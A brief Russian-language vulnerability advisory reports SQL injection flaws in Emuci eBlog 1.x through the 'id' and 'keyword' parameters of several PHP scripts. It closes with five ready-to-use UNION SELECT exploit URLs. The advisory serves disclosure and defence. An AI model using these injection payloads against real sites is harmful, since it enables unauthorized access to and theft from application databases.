Программа: Emuci eBlog 1.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "id" сценариями topics.php и sections.php. Удаленный пользователь
может с помощью специально сформированного запроса выполнить произвольные SQL
команды в базе данных приложения.
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "id" сценарием pages.php и в параметре "keyword" сценарием search.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://site/path/topics.php?action=ShowComment&id=-1 UNION SELECT
1,2,3,4,5,6,7%23
http://site/path/pages.php?id=-1' UNION SELECT 1,2,3,4,1,6,7,1%23
http://site/path/topics.php?action=show&id=-1' UNION SELECT 1,2,3,4,5,6,7,8%23
http://site/path/sections.php?action=show&id=-1' UNION SELECT 1,2,3,4,5%23
http://site/path/search.php?keyword=%25' UNION SELECT 1,2,3,4,5,6,7,8%23